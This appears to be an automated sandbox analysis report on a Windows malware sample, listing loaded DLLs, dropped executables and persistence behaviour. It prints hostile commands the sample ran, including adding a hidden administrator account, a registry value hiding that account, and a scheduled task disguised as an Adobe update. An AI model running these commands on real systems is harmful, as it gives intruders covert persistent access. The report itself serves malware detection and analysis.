Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll

Source: C:\Windows\SysWOW64\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\System32\wscript.exe	Directory created: C:\Program Files\RDP Wrapper\
Source: C:\Windows\System32\wscript.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.bat

Source: 8lOT1rXZp5.exe

Static file information: File size 4288512 > 1048576

Data Obfuscation

Obfuscated command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff	Jump to behavior

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe

Code function: 0_2_00407F31 LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetDlgItem,GetWindow,

0_2_00407F31

Source: 8lOT1rXZp5.exe

Static PE information: real checksum: 0x4168fb should be: 0x41ff11

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_00419210 push eax; ret	0_2_0041923E
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_00418F40 push ecx; mov dword ptr [esp], ecx	0_2_00418F41
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C50E96 push ecx; ret	7_2_00C50EA9
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A20E96 push ecx; ret	10_2_00A20EA9
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005C0E96 push ecx; ret	13_2_005C0EA9

Persistence and Installation Behavior

Adds a new user with administrator rights

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup Administrators fsUIwEqMAc /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup Administrators fsUIwEqMAc /add

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	File created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53"

Hooking and other Techniques for Hiding and Protection

Hides user accounts

Source: C:\Windows\SysWOW64\reg.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList fsUIwEqMAc

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CC231B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	7_2_00CC231B
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C4FC88 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	7_2_00C4FC88
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A9231B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	10_2_00A9231B
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A1FC88 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	10_2_00A1FC88
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_0063231B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	13_2_0063231B
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005BFC88 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	13_2_005BFC88

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
